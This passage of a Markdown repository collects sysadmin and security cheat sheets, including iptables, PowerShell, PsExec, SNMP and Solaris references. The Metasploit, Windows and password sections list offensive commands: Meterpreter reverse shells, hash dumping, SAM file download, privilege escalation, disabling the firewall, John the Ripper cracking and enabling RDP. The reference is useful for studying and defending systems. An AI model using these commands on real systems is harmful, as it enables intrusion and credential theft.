    if (!preg_match('/' . preg_quote($ip, '/') . '/', (string) $result)) {
        $failed = true;
    }
}
echo $failed ? "0\n" : "1\n";
?>
```

### Monitoring NTP[[31]]

```bash
#!/usr/local/bin/bash
# ntptest
# NTP test script for the Zabbix monitor. Conditional return:
# 1 = success, 0 = failed response
HOST_QUERY=$1
# a line starting with '*' in ntpq -pn output is the peer the host is synchronised to
if [ "$(ntpq -pn "$HOST_QUERY" | grep -E -c '^\*')" -eq 1 ]; then
    # Sync peer reported, OK
    echo "1"
else
    echo "0"
fi
```

NOTICE: Works with a *nix Zabbix Server

### Special shell variables to be aware of [[32]]

```
$*      # All positional arguments; useful in for loops
$?      # Exit status of the last command executed
$$      # PID of the current shell
$!      # PID of the last background process
$EUID   # Effective UID the script runs as
```

### Linux Iptables Firewall Shell Script For Standalone Server[[33]]

```bash
#!/bin/bash
# A Linux Shell Script with common rules for IPTABLES Firewall.
# By default this script only opens ports 80, 22, 53 (input)
# All outgoing traffic is allowed (default - output)
# -------------------------------------------------------------------------
# Copyright (c) 2004 nixCraft project
# This script is licensed under GNU GPL version 2.0 or above
# -------------------------------------------------------------------------
# This script is part of nixCraft shell script collection (NSSC)
# Visit http://bash.cyberciti.biz/ for more information.
# -------------------------------------------------------------------------
IPT="/sbin/iptables"
SPAMLIST="blockedip"
SPAMDROPMSG="BLOCKED IP DROP"
echo "Starting IPv4 Wall..."
# flush and delete all existing rules and chains in every table
$IPT -F
$IPT -X
$IPT -t nat -F
$IPT -t nat -X
$IPT -t mangle -F
$IPT -t mangle -X
modprobe ip_conntrack
# optional block list: one IP or network per line, '#' comments allowed
[ -f /root/scripts/blocked.ips.txt ] && BADIPS=$(grep -vE "^#|^$" /root/scripts/blocked.ips.txt)
PUB_IF="eth0"
# unlimited traffic on loopback
$IPT -A INPUT -i lo -j ACCEPT
$IPT -A OUTPUT -o lo -j ACCEPT
# DROP all incoming traffic by default
$IPT -P INPUT DROP
$IPT -P OUTPUT DROP
$IPT -P FORWARD DROP
if [ -f /root/scripts/blocked.ips.txt ];
then
    # create a new iptables chain for the block list
    $IPT -N $SPAMLIST
    for ipblock in $BADIPS
    do
        $IPT -A $SPAMLIST -s $ipblock -j LOG --log-prefix "$SPAMDROPMSG"
        $IPT -A $SPAMLIST -s $ipblock -j DROP
    done
    $IPT -I INPUT -j $SPAMLIST
    $IPT -I OUTPUT -j $SPAMLIST
    $IPT -I FORWARD -j $SPAMLIST
fi
# Block new connections that do not start with a SYN
$IPT -A INPUT -i ${PUB_IF} -p tcp ! --syn -m state --state NEW -m limit --limit 5/m --limit-burst 7 -j LOG --log-level 4 --log-prefix "Drop Sync"
$IPT -A INPUT -i ${PUB_IF} -p tcp !
```
--syn -m state --state NEW -j DROP 117 | # Block Fragments 118 | $IPT -A INPUT -i ${PUB_IF} -f -m limit --limit 5/m --limit-burst 7 -j LOG --log-level 4 --log-prefix "Fragments Packets" 119 | $IPT -A INPUT -i ${PUB_IF} -f -j DROP 120 | # Block bad stuff 121 | $IPT -A INPUT -i ${PUB_IF} -p tcp --tcp-flags ALL FIN,URG,PSH -j DROP 122 | $IPT -A INPUT -i ${PUB_IF} -p tcp --tcp-flags ALL ALL -j DROP 123 | $IPT -A INPUT -i ${PUB_IF} -p tcp --tcp-flags ALL NONE -m limit --limit 5/m --limit-burst 7 -j LOG --log-level 4 --log-prefix "NULL Packets" 124 | $IPT -A INPUT -i ${PUB_IF} -p tcp --tcp-flags ALL NONE -j DROP # NULL packets 125 | $IPT -A INPUT -i ${PUB_IF} -p tcp --tcp-flags SYN,RST SYN,RST -j DROP 126 | $IPT -A INPUT -i ${PUB_IF} -p tcp --tcp-flags SYN,FIN SYN,FIN -m limit --limit 5/m --limit-burst 7 -j LOG --log-level 4 --log-prefix "XMAS Packets" 127 | $IPT -A INPUT -i ${PUB_IF} -p tcp --tcp-flags SYN,FIN SYN,FIN -j DROP #XMAS 128 | $IPT -A INPUT -i ${PUB_IF} -p tcp --tcp-flags FIN,ACK FIN -m limit --limit 5/m --limit-burst 7 -j LOG --log-level 4 --log-prefix "Fin Packets Scan" 129 | $IPT -A INPUT -i ${PUB_IF} -p tcp --tcp-flags FIN,ACK FIN -j DROP # FIN packet scans 130 | $IPT -A INPUT -i ${PUB_IF} -p tcp --tcp-flags ALL SYN,RST,ACK,FIN,URG -j DROP 131 | # Allow full outgoing connection but no incomming stuff 132 | $IPT -A INPUT -i eth0 -m state --state ESTABLISHED,RELATED -j ACCEPT 133 | $IPT -A OUTPUT -o eth0 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT 134 | # Allow ssh 135 | $IPT -A INPUT -p tcp --destination-port 22 -j ACCEPT 136 | # allow incomming ICMP ping pong stuff 137 | $IPT -A INPUT -p icmp --icmp-type 8 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT 138 | $IPT -A OUTPUT -p icmp --icmp-type 0 -m state --state ESTABLISHED,RELATED -j ACCEPT 139 | # Allow port 53 tcp/udp (DNS Server) 140 | $IPT -A INPUT -p udp --dport 53 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT 141 | $IPT -A OUTPUT -p udp --sport 53 -m state --state ESTABLISHED,RELATED 
-j ACCEPT 142 | $IPT -A INPUT -p tcp --destination-port 53 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT 143 | $IPT -A OUTPUT -p tcp --sport 53 -m state --state ESTABLISHED,RELATED -j ACCEPT 144 | # Open port 80 145 | $IPT -A INPUT -p tcp --destination-port 80 -j ACCEPT 146 | ##### Add your rules below ###### 147 | ##### END your rules ############ 148 | # Do not log smb/windows sharing packets - too much logging 149 | $IPT -A INPUT -p tcp -i eth0 --dport 137:139 -j REJECT 150 | $IPT -A INPUT -p udp -i eth0 --dport 137:139 -j REJECT 151 | # log everything else and drop 152 | $IPT -A INPUT -j LOG 153 | $IPT -A FORWARD -j LOG 154 | $IPT -A INPUT -j DROP 155 | exit 0 156 | [27]: 157 | [28]: 158 | [29]: 159 | [30]: 160 | [31]: 161 | [32]: 162 | [33]: -------------------------------------------------------------------------------- /Collection/Linux System Info.md: -------------------------------------------------------------------------------- 1 | # Linux system info [[34]] 2 | 3 | Most common commands used to check information and configuration details about various hardware peripherals and devices. 
    $ lscpu # Reports information about CPU and processing units
    $ lshw # List hardware
    $ hwinfo # Hardware information
    $ lspci # List PCI devices
    $ lsscsi # List SCSI devices
    $ lsusb # List USB buses and device details
    $ inxi # Bash script that fetches hardware details
    $ lsblk # List block devices
    $ df # Disk space of file systems
    $ pydf # Python df
    $ fdisk # Utility to modify partitions on hard drives
    $ mount # Used to mount/unmount and view mounted file systems
    $ free # Check RAM
    $ dmidecode # Extracts hardware information by reading data from the SMBIOS data structures
    /proc # Virtual files in the /proc directory contain information about hardware and configuration
    $ hdparm # Gets information about SATA devices

[34]:
--------------------------------------------------------------------------------
/Collection/Manipulating files.md:
--------------------------------------------------------------------------------
# Manipulating files [[35]]

Most frequently used Linux commands for manipulating files.

    $ cp file1 file2 # Copies the contents of file1 into file2. If file2 does not exist, it is created
    $ cp -i file1 file2 # If file2 exists, the user is prompted before it is overwritten with the contents of file1
    $ mv file1 file2 # If file2 does not exist, then file1 is renamed file2. If file2 exists, its contents are replaced with the contents of file1
    $ rm file1 file2 # Deletes file1 and file2
    $ mkdir directory # Create directories

[35]:
--------------------------------------------------------------------------------
/Collection/Metasploit.md:
--------------------------------------------------------------------------------
# Metasploit [[36]]

### Meterpreter Payloads

    set payload windows/meterpreter/reverse_tcp # Windows reverse tcp payload
    set payload windows/vncinject/reverse_tcp # Meterpreter Windows VNC payload
    set ViewOnly false
    set payload linux/meterpreter/reverse_tcp # Meterpreter Linux reverse payload

### Meterpreter Cheat Sheet

    upload file c:\\windows # Meterpreter upload file to Windows target
    download c:\\windows\\repair\\sam /tmp # Meterpreter download file from Windows target
    execute -f c:\\windows\\temp\\exploit.exe # Meterpreter run .exe on target - handy for executing uploaded exploits
    execute -f cmd -c # Creates new channel with cmd shell
    ps # Meterpreter show processes
    shell # Meterpreter get shell on the target
    getsystem # Meterpreter attempts privilege escalation on the target
    hashdump # Meterpreter attempts to dump the hashes on the target
    portfwd add -l 3389 -p 3389 -r target # Meterpreter create port forward to target machine
    portfwd delete -l 3389 -p 3389 -r target # Meterpreter delete port forward

### Auxiliary Metasploit Modules

    use auxiliary/scanner/http/dir_scanner # Metasploit HTTP directory scanner
    use auxiliary/scanner/http/jboss_vulnscan # Metasploit JBOSS vulnerability scanner
    use auxiliary/scanner/mssql/mssql_login # Metasploit MSSQL credential scanner
    use auxiliary/scanner/mysql/mysql_version # Metasploit MySQL version scanner
    use auxiliary/scanner/oracle/oracle_login # Metasploit Oracle login module

### Metasploit Powershell Modules

    use exploit/multi/script/web_delivery # Metasploit powershell payload delivery module
    post/windows/manage/powershell/exec_powershell # Metasploit upload and run powershell script through a session
    use exploit/multi/http/jboss_maindeployer # Metasploit JBOSS deploy
    use exploit/windows/mssql/mssql_payload # Metasploit MSSQL payload

[36]:
--------------------------------------------------------------------------------
/Collection/Miscellaneous Commands Windows.md:
--------------------------------------------------------------------------------
# Miscellaneous commands Windows [[37]]

### Lock Workstation

    rundll32.exe user32.dll,LockWorkStation

### Disable Windows Firewall

    netsh advfirewall set currentprofile state off
    netsh advfirewall set allprofiles state off

### Native Windows Port Forward

    netsh interface portproxy add v4tov4 listenport=3000 listenaddress=1.1.1.1 connectport=4000 connectaddress=2.2.2.2

    # Remove
    netsh interface portproxy delete v4tov4 listenport=3000 listenaddress=1.1.1.1

NOTICE: Must use administrative privileges.
### Re-Enable Command prompt

    reg add HKCU\Software\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 0 /f

[37]:
--------------------------------------------------------------------------------
/Collection/Packet Capturing.md:
--------------------------------------------------------------------------------
# Packet Capturing [[38]]

    tcpdump -i eth0 # Capture packets from a specific interface
    tcpdump -c 5 -i eth0 # Capture only N packets
    tcpdump -A -i eth0 # Print captured packets in ASCII
    tcpdump -D # Display available interfaces
    tcpdump -XX -i eth0 # Display captured packets in HEX and ASCII
    tcpdump -w 0001.pcap -i eth0 # Capture and save packets to a file
    tcpdump -r 0001.pcap # Read a captured packets file
    tcpdump -n -i eth0 # Capture packets showing numeric IP addresses instead of resolved hostnames
    tcpdump -i eth0 tcp # Capture only TCP packets
    tcpdump -i eth0 port 22 # Capture packets from a specific port
    tcpdump -i eth0 src 192.168.0.2 # Capture packets from a source IP
    tcpdump -i eth0 dst 50.116.66.139 # Capture packets to a destination IP

[38]:
--------------------------------------------------------------------------------
/Collection/Password Cracking.md:
--------------------------------------------------------------------------------
# Password Cracking [[39]]

## John The Ripper - JTR

### JTR password cracking

    john --wordlist=/usr/share/wordlists/rockyou.txt hashes

### JTR forced descrypt cracking with wordlist

    john --format=descrypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

### JTR show cracked descrypt passwords

    john --format=descrypt hash --show

[39]:
--------------------------------------------------------------------------------
/Collection/Powershell.md:
--------------------------------------------------------------------------------
# Powershell [[40]]

    # # Comment / Remark
    $_ # The current pipeline object
    $variable = "value" # Define a variable, also: ${n!a#me} = "value"
    % # Alias for ForEach-Object
    --% # Stop parsing input
    & (call) # Run a command, script or function
    . (source) # Run a command script in the current shell
    ? # Alias for Where-Object
    @(...) # Force an expression to be evaluated as an array
    -f # Format operator
    Active Directory # Account, Computer, Group and User cmdlets
    Add-Computer # Add a computer to the domain
    Add-Content # Add to the content of the item
    Add-History # Add entries to the session history
    Add-Member # Add a member to an instance of a PowerShell object
    Add-PsSnapIn # Add snap-ins to the console
    Add-Type # Add a .NET Framework type to a PowerShell session
    Add-WindowsFeature # Install roles, role services, and features
    Backup-GPO # Backup group policy objects (GPOs)
    Begin # Function BEGIN block
    BITS # Background Intelligent Transfer Service cmdlets
    Break # Exit a program loop
    Catch # Handle a terminating error within a scriptblock
    Checkpoint-Computer # Create a system restore point (XP)
    Checkpoint-Web # Create a checkpoint for an IIS web app
    Clear-Content # Remove content from a file/item
    Clear-EventLog # Delete all entries from an event log
    Clear-History # Delete entries from the session history
    Clear-Host # Clear the screen
    Clear-Item # Remove content from a variable or an alias
    Clear-ItemProperty # Remove the property value from a property
    Clear-Variable # Remove the value from a variable
    Compare-Object # Compare the properties of objects
    Complete-Transaction # Commit the transaction
    Compress-Archive # Create a new archive/zipped file [PS 5+]
    Connect-WSMan # Connect to the WinRM service on a remote computer
    Continue # Skip just this iteration of a loop
    ConvertFrom-CSV # Convert object properties (in CSV format) into CSV objects
    ConvertFrom-SecureString # Convert a secure string into an encrypted standard string
    ConvertFrom-StringData # Convert a here-string into a hash table
    Convert-Path # Convert a PS path to a provider path
    ConvertTo-CSV # Convert .NET Framework objects into CSV variable
    ConvertTo-Html # Convert the input into an HTML table
    ConvertTo-SecureString # Convert an encrypted standard string into a secure string
    ConvertTo-Xml # Convert the input into XML
    Copy-Item # Copy an item from a namespace location
    Copy-ItemProperty # Copy a property along with its value
    Debug-Process # Attach a debugger to a running process
    Disable-ComputerRestore # Disable System Restore on a drive
    Disable-PSBreakpoint # Disable a breakpoint in the current console
    Disable-PSRemoting # Disable remote session configuration on the local computer
    Disable-PSSessionConfiguration # Disable session configurations on the local computer
    Disable-WSManCredSSP # Disable Credential Security Service Provider (SSP) authentication
    Disconnect-WSMan # Disconnect from the WinRM service on a remote computer
    Do # Loop while a condition is True
    Enable-ComputerRestore # Enable System Restore on a drive
    Enable-PSBreakpoint # Enable a breakpoint in the current console
    Enable-PSRemoting # Run PowerShell commands on remote computers
    Enable-PSSessionConfiguration # Enable session configurations on the local computer
    Enable-WSManCredSSP # Enable Credential SSP authentication
    End # Function END block
    Enter-PSSession # Start an interactive session with a remote computer
    Exit # Exit PowerShell (or exit a script)
    Exit-PSSession # End an interactive session with a remote computer
    Expand-Archive # Extract files from an archive (zipped) file [PS 5+]
    Export-Alias # Export an alias list to a file
    Export-Clixml # Produce a clixml representation of PowerShell objects
    Export-Console # Export console configuration to a file
    Export-Counter # Export Performance Counter data to log files
    Export-Csv # Export to Comma Separated Values (spreadsheet)
    Export-FormatData # Save formatting data from the current session
    Export-ModuleMember # Export specific module members
    Export-PSSession # Import commands and save them in a PowerShell module
    For # Loop through items that match a condition
    ForEach # Loop through each item in a collection
    ForEach method # Loop through each item in a collection
    ForEach-Object # Loop through each item in the pipeline ( % )
    Format-Custom # Format output using a customized view
    Format-List # Format output as a list of properties, each on a new line
    Format-Table # Format output as a table
    Format-Wide # Format output as a table listing one property only
    Get-Acl # Get permission settings for a file or registry key
    Get-Alias # Return alias names for Cmdlets
    Get-AuthenticodeSignature # Get the signature object associated with a file
    Get-ChildItem # Get child items (contents of a folder or registry key)
    Get-Command # Get basic information about cmdlets and other commands
    Get-ComputerRestorePoint # Get the restore points on the local computer
    Get-Content # Get content from item (specific location)
    Get-Counter # Get performance counter data
    Get-Credential # Get a security credential (username/password)
    Get-Culture # Get region information (language and keyboard layout)
    Get-Date # Get current date and time
    Get-DscConfiguration # Get the current config. of a node
    Get-DscLocalConfigurationManager # Get Local Config Manager settings
    Get-DscResource # Get Desired State Config. resources from a computer
    Get-Event # Get events in the PowerShell event queue
    Get-Eventlog # Get event log data (2003)
    Get-EventSubscriber # Get event subscribers
    Get-ExecutionPolicy # Get the execution policy for the shell
    Get-FormatData # Get the formatting data in the current session
    Get-Help # Open the help file
    Get-History # Get a listing of the session history
    Get-Host # Get host information (PowerShell Version and Region)
    Get-HotFix # Get installed hotfixes
    Get-Item # Get a file/registry object (or any other namespace object)
    Get-ItemProperty # Retrieve the properties of an object
    Get-Job # Get PowerShell background jobs that are running
    Get-Location # Get and display the current location
    Get-Member # Enumerate the properties of an object
    Get-Module # Get the modules imported to the session
    Get-Pfxcertificate # Get pfx certificate information
    Get-Process # Get a list of processes on a machine
    Get-PSBreakpoint # Get the currently set breakpoints
    Get-PSDrive # Get drive information (DriveInfo)
    Get-PSProvider # Get information for the specified provider
    Get-PSSession # Get the PSSessions in the current session
    Get-PSSessionConfiguration # Get the registered PS session configuration
    Get-PsSnapin # List PowerShell snap-ins on this computer
    Get-Random # Get a random number
    Get-Service # Get a list of services
    Get-Tracesource # Get components that are instrumented for tracing
    Get-Transaction # Get information about the active transaction
    Get-Uiculture # Get the UI culture information
    Get-Unique # Get the unique items in a collection
    Get-Variable # Get a PowerShell variable
    Get-WebApplicationMonitoringStatus # Get the monitoring status of web apps
    Get-WindowsFeature # Retrieve roles, role services, and features
    Get-WinEvent # Get event log data (Vista+)
    Get-WmiObject # Get WMI class information
    Get-WSManCredSSP # Get the Credential SSP configuration
    Get-WSManInstance # Display management information (XML or value)
    Group-Object # Group objects that contain the same value
    if # Conditionally perform a command
    Import-Alias # Import an alias list from a file
    Import-Clixml # Import a clixml file and rebuild the PS object
    Import-Counter # Import performance counter log files
    Import-Csv # Take values from a CSV list and send objects down the pipeline
    Import-GPO # Import Group Policy settings into a specified GPO
    Import-Module # Add a module to the session
    Import-PSSession # Import commands from another session
    Invoke-Command # Run commands on local and remote computers
    Invoke-Expression # Run a PowerShell expression
    Invoke-History # Invoke a previously executed Cmdlet
    Invoke-Item # Invoke an executable or open a file (START)
    Invoke-WmiMethod # Call WMI methods
    Invoke-WSManAction # Invoke an action on a specified object
    Job Trigger cmdlets # Get/Set scheduled job triggers
    Join-Path # Combine a path and child-path
    Limit-EventLog # Limit the size of the event log
    Measure-Command # Measure running time
    Measure-Object # Measure the properties of an object
    Move-Item # Move an item from one location to another
    Move-ItemProperty # Move a property from one location to another
    New-Alias # Create a new alias
    New-DSCCheckSum # Create checksum files for DSC docs/resources
    New-Event # Create a new event
    New-Eventlog # Create a new event log and a new event source
    New-Item # Create a new item in a namespace
    New-ItemProperty # Set a new property
    New-Module # Create a new dynamic module (only in memory)
    New-Object # Create a new .Net object
    New-PSDrive # Create a mapped network drive
    New-PSSession # Create a persistent connection to a local or remote computer
    New-PSSessionOption # Advanced options for a PSSession
    New-Service # Create a new service
    New-Timespan # Create a timespan object
    New-Variable # Create a new variable
    New-WebServiceProxy # Create a Web service proxy object
    New-WSManInstance # Create a new instance of a management resource
    New-WSManSessionOption # Options for WSMan commands
    Out-Default # Send output to default
    Out-File # Send output to a file
    Out-GridView # Send output to an interactive table
    Out-Host # Send output to the host
    Out-Null # Send output to null
    Out-Printer # Send the output to a printer
    Out-String # Send objects to the host as strings
    Param # Script parameters
    Pause # Pause and display the message "Press Enter to continue"
    Pop-Location # Set the current working location from the stack
    Powershell # Launch a PowerShell session
    Process # Function PROCESS block
    Push-Location # Push a location to the stack
    Quest AD # Read and write to Active Directory
    Read-Host # Read a line of input from the host console
    Receive-Job # Get PowerShell background job results
    Register-EngineEvent # Subscribe to PowerShell events
    Register-ObjectEvent # Subscribe to .NET events
    Register-PSSessionConfiguration # Create and register a new PS session configuration
    Register-WmiEvent # Subscribe to a WMI event
    Remove-Computer # Remove the local computer from a workgroup or domain
    Remove-Event # Delete events from the event queue
    Remove-EventLog # Delete an event log
    Remove-Item # Delete an item (del/erase/rd/ri/rm/rmdir)
    Remove-ItemProperty # Remove a property and its value
    Remove-Job # Delete a PowerShell background job
    Remove-Module # Remove a module from the current session
    Remove-PSBreakpoint # Delete breakpoints from the current console
    Remove-PSDrive # Remove a provider/drive from its location
    Remove-PSSession # Close PowerShell sessions
    Remove-PSSnapin # Remove PowerShell snap-ins from the console
    Remove-Variable # Remove a variable and its value
    Remove-WindowsFeature # Remove roles, role services, and features
    Remove-WmiObject # Delete an instance of a WMI class
    Remove-WSManInstance # Delete a management resource instance
    Rename-Item # Change the name of an existing item
    Rename-ItemProperty # Rename a property of an item
    Reset-ComputerMachinePassword # Reset the machine account password for the computer
    Resolve-Path # Resolves the wildcards in a path
    Restart-Computer # Restart the operating system on a computer
    Restart-Service # Stop and then restart a service
    Restore-Computer # Restore the computer to a previous state
    Restore-GPO # Restore one or all GPOs from a GPO backup
    Resume-Service # Resume a suspended service
    Return # Exit the current scope (function, script, or script block)
    Run/Call # Run a command (call operator)
    Scheduler # Get/Set scheduled jobs
    Select-Object # Select properties of objects
    Select-String # Search through strings or files for patterns
    Select-XML # Find text in an XML string or document
    Send-MailMessage # Send an email message
    Set-Acl # Set permissions
    Set-Alias # Create or change an alias
    Set-AuthenticodeSignature # Place a signature in a .ps1 script or other file
    Set-Content # Set content in the item (specific location)
    Set-Date # Set system time on the host system
    Set-ExecutionPolicy # Change the execution policy (user preference)
    Set-Item # Change the value of an item
    Set-ItemProperty # Set a property at the specified location to a specified value
    Set-Location # Set the current working location
    Set-PSBreakpoint # Set a breakpoint on a line, command, or variable
    Set-PSDebug # Turn script debugging on or off
    Set-PSSessionConfiguration # Change properties of a registered session config
    Set-Service # Change the start mode/properties of a service
    Set-StrictMode # Enforce coding rules in expressions & scripts
    Set-Tracesource # Trace a PowerShell component
    Set-Variable # Set a variable and a value
    Set-WmiInstance # Create or update an instance of an existing WMI class
    Set-WSManInstance # Modify the management information related to a resource
    Set-WSManQuickConfig # Configure the local computer for remote management
    Show-EventLog # Display an event log
    Sort-Object # Sort objects by property value
    Split-Path # Return part of a path
    Start-DscConfiguration # Apply Desired State config to nodes
    Start-Job # Start a PowerShell background job
    Start-Process # Start one or more processes
    Start-Service # Start a stopped service
    Start-Sleep # Suspend shell, script, or runspace activity
    Start-Transaction # Start a new transaction
    Start-Transcript # Start a transcript of a command shell session
    Stop-Computer # Stop (shut down) a computer
    Stop-Job # Stop a PowerShell background job
    Stop-Process # Stop a running process
    Stop-Service # Stop a running service
    Stop-Transcript # Stop the transcription process
    Suspend-Service # Suspend a running service
    Switch # Multiple if statements
    Tee-Object # Send input objects to two places
    Test-ComputerSecureChannel # Test and repair the secure channel to the domain
    Test-Connection # Ping one or more computers
    Test-Path # Return true if the path exists, otherwise return false
    Test-WSMan # Test if a computer is set up to receive remote commands
    Trace-Command # Trace an expression or command
    Trap # Handle a terminating error
    Try ... Catch # Handle a terminating error within a scriptblock
    Unblock-File # Unblock files downloaded from the Internet
    Undo-Transaction # Roll back a transaction
    Unregister-Event # Cancel an event subscription
    Unregister-PSSessionConfiguration # Delete a registered PS session configuration
    Update-FormatData # Update and append format data files
    Update-Help # Download and install help files
    Update-List # Add and remove items from a collection
    Update-TypeData # Update the current extended type configuration
    Use-Transaction # Add a command or expression to the transaction
    Wait-Event # Wait until a particular event is raised
    Wait-Job # Wait for a background job
    Wait-Process # Wait for a process to stop
    Where method # Filter objects from a collection
    Where-Object # Filter the objects passed along the command pipeline
    While # Loop while a condition is True
    Write-Debug # Write a debug message to the host display
    Write-Error # Write an object to the error pipeline
    Write-EventLog # Write an event to an event log
    Write-Host # Display customized output on the host/screen
    Write-Output # Write an object to the pipeline
    Write-Progress # Display a progress bar
    Write-Verbose # Write a string to the host's verbose display
    Write-Warning # Write a string in reverse video to the display
    Zipfile # Compress or extract zip files

[40]:
--------------------------------------------------------------------------------
/Collection/PsExec.md:
--------------------------------------------------------------------------------
# PsExec [[41]]

PsExec is a light-weight telnet replacement that lets you execute processes on other systems, complete with full interactivity for console applications, without having to manually install client software.

# The following command launches an interactive command prompt on \\marklap:

    psexec \\marklap cmd

# This command executes IpConfig on the remote system with the /all switch, and displays the resulting output locally

    psexec \\marklap ipconfig /all

# This command copies the program test.exe to the remote system and executes it interactively

    psexec \\marklap -c test.exe

# Specify the full path to a program that is already installed on a remote system if it's not on the system's path

    psexec \\marklap c:\bin\test.exe

# Run Regedit interactively in the System account to view the contents of the SAM and SECURITY keys

    psexec -i -d -s c:\windows\regedit.exe

# To run Internet Explorer with limited-user privileges use this command

    psexec -l -d "c:\program files\internet explorer\iexplore.exe"

[41]:
-------------------------------------------------------------------------------- /Collection/Running Remote Commands.md: -------------------------------------------------------------------------------- 1 | # Running remote commands[[42]] 2 | Many Windows PowerShell cmdlets have the ComputerName parameter that enables you to collect data and change settings on one or more remote computers. They use a variety of communication technologies and many work on all Windows operating systems that Windows PowerShell supports without any special configuration. 3 | 4 | Typically, cmdlets that support remoting without special configuration have the ComputerName parameter and do not have the Session parameter. To find these cmdlets in your session, type: 5 | 6 | Get-Command | where { $_.parameters.keys -contains "ComputerName" -and $_.parameters.keys -notcontains "Session"} 7 | 8 | ### Start an Interactive Session 9 | 10 | To start an interactive session with a single remote computer, we use the Enter-PSSession cmdlet. 11 | 12 | Enter-PSSession Server01 13 | 14 | ### Exit Session 15 | 16 | Exit-PSSession 17 | 18 | ### Running a remote command 19 | 20 | To run any command on one or many remote computers, use the Invoke-Command cmdlet. For example, to run a Get-UICulture command on the Server01 and Server02 remote computers, type: 21 | 22 | Invoke-Command -ComputerName Server01, Server02 {Get-UICulture} 23 | 24 | ### Output example 25 | 26 | ![Untitled.png](https://www.dropbox.com/s/k545zhqu94vn33c/Untitled.png?dl=0&raw=1) 27 | 28 | ### Run a script 29 | 30 | Invoke-Command -ComputerName Server01, Server02 -FilePath c:\Scripts\DiskCollect.ps1 31 | 32 | ### Establish a Persistent Connection 33 | Following command creates a remote session on the Server01 computer and another remote session on the Server02 computer. It saves the session objects in the $s variable. 
34 | 35 | $s = New-PSSession -ComputerName Server01, Server02 36 | 37 | Now that the sessions exist you can run any command in them, and because the sessions are persistent you can collect data in one command and use it in a subsequent one. The following command runs Get-HotFix in the sessions in $s and saves the results in the $h variable on each remote computer. 38 | 39 | Invoke-Command -Session $s {$h = Get-HotFix} 40 | 41 | Now you can use the data in the $h variable in subsequent commands, such as the following one. The results are displayed on the local computer. 42 | 43 | Invoke-Command -Session $s {$h | where {$_.installedby -ne "NTAUTHORITY\SYSTEM"}} 44 | 45 | [42]: 46 | 47 | -------------------------------------------------------------------------------- /Collection/SNMP.md: -------------------------------------------------------------------------------- 1 | # SNMP 2 | 3 | ### Concept [[43]] 4 | 5 | ![snmp.png](https://www.dropbox.com/s/srwfkxgbqyep6yo/snmp.png?dl=0&raw=1) 6 | 7 | ### Command Examples [[44]] 8 | This command returns the administratively assigned name of the managed node (sysName.0). The -c option supplies the community string, here the default read community public; in SNMPv1 and v2c the community string is the only authentication and travels in cleartext. 9 | 10 | % snmpget -mALL -v1 -cpublic snmp_agent_Ip_address sysName.0 11 | The snmpwalk command performs a sequence of chained GETNEXT requests automatically, saving you from issuing them one at a time.
12 | 13 | % snmpwalk -mALL -v1 -cpublic snmp_agent_Ip_address system 14 | 15 | The snmpbulkwalk command uses the GETBULK operation (SNMPv2c and later) to retrieve an entire subtree of information about a network entity in far fewer round trips than a GETNEXT walk. 16 | 17 | % snmpbulkwalk -mALL -v2c -cprivate snmp_agent_Ip_address entPhysicalTable>time7 18 | 19 | 20 | 21 | [43]: 22 | [44]: 23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /Collection/Solaris.md: -------------------------------------------------------------------------------- 1 | # Solaris [[45]] 2 | 3 | ifconfig -a # List of interfaces 4 | netstat -in # List of interfaces 5 | netstat -r # Route listing 6 | ifconfig eth0 dhcp # Start DHCP client 7 | ifconfig eth0 plumb up ip netmask nmask # Set IP 8 | route add default ip # Set gateway 9 | logins -p # List users w/out passwords 10 | svcs -a # List all services w/ status 11 | prstat -a # Process listing (top) 12 | svcadm start ssh # Start SSH service 13 | inetadm -e telnet (-d to disable) # Enable telnet 14 | prtconf | grep Memory # Total physical memory 15 | iostat -En # Hard disk size 16 | showrev -c /usr/bin/bash # Information on a binary 17 | shutdown -i6 -g0 -y # Restart system 18 | dfmounts # List clients connected NFS 19 | smc # Solaris Management Console (GUI) 20 | snoop -d int -c pkt -o results.pcap # Packet capture: pkt packets on interface int, written to results.pcap 21 | /etc/vfstab # File system mount table 22 | /var/adm/loginlog # Failed login attempt log 23 | /etc/default/* # Default settings 24 | /etc/system # Kernel modules & config 25 | /var/adm/messages # Syslog location 26 | /etc/auto_* # Automounter config files 27 | /etc/inet/ipnodes # IPv4/IPv6 host file 28 | 29 | [45]: 30 | 31 | 32 | 33 | 34 | -------------------------------------------------------------------------------- /Collection/Startup Directories.md: -------------------------------------------------------------------------------- 1 | # Startup Directories [[46]] 2 | 3 | ### NT 6.1 4 | 5 | Personal Startup folder: 6 | 7 |
%SystemDrive%\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup 8 | 9 | All Users: 10 | 11 | %SystemDrive%\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup 12 | 13 | Shortcut: Run -> shell:common startup 14 | 15 | [46]: https://watchthestack.files.wordpress.com/2015/03/rtfm-red-team-field-manual.pdf 16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /Collection/Terminal Services.md: -------------------------------------------------------------------------------- 1 | # Terminal Services[[47]] 2 | Terminal Services provides the ability to host multiple, simultaneous client sessions on Microsoft Windows Server 2003. 3 | 4 | ### Terminal Services Architecture 5 | 6 | ![aa.gif](https://www.dropbox.com/s/mon59ohqha3p7g8/aa.gif?dl=0&raw=1) 7 | 8 | ### Start RDP 9 | 10 | 1. Create a regfile.reg file with the following lines in it (clearing fDenyTSConnections is what allows Remote Desktop connections): 11 | Windows Registry Editor Version 5.00 12 | [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] 13 | "fDenyTSConnections"=dword:00000000 14 | 2. reg import regfile.reg 15 | 3. net start "termservice" 16 | 4. sc config termservice start= auto 17 | 5.
